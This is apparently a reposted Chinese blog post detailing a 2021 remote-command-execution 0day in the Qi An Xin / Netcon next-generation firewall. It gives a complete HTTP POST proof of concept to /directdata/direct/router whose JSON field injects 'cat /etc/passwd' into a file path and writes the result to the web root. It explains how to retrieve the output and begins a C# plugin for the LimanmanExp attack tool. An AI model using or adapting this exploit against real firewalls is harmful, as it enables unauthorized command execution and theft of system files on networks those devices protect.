2021年HW0day-奇安信 网康下一代防火墙 RCE漏洞细节

转:

2021年HW0day-奇安信 网康下一代防火墙 RCE漏洞细节

漏洞信息:

漏洞名称:奇安信 网康下一代防火墙 RCE漏洞。
漏洞性质:远程命令执行
漏洞利用特点:命令执行之后没有回显
利用方式:防火墙使用linux进行开发的,可以使用echo xxx >123.txt这样的方式写入文件。 当文件生成目录在网站根目录下就可以直接访问了。

POC

POC为POST 类型的HTTP 请求报文

POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://x.x.x.x/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 178

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

以上的poc部分header选择性增删改查。
payload为"data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} 部分。

结果获取

POC为http报文。发送之后访问https://xx.xx.xx.xx/test_test.txt 即可获得命令执行结果
2021年HW0day-奇安信 网康下一代防火墙 RCE漏洞细节

基于LimanmanExp的攻击工具开发。

由于本漏洞的触发是基于HTTP 请求的,所以可以使用limanmanExp 进行攻击插件进行开发。
limanmanExp开发

构建url

public Dictionary<string, string=""> Poc_GetUrl(Dictionary<string, dictionary<string,="" string="">> data)
        {//url
            Dictionary<string, string=""> numberOfTime = new Dictionary<string, string="">();
            Dictionary<string, string=""> url = new Dictionary<string, string="">();
            url= data["url"];
            url["url"] += "/directdata/direct/router";
            //**do something**
            return url;

        }
上一篇:36进制转换10进制


下一篇:JavaScript数据结构与算法 - 字典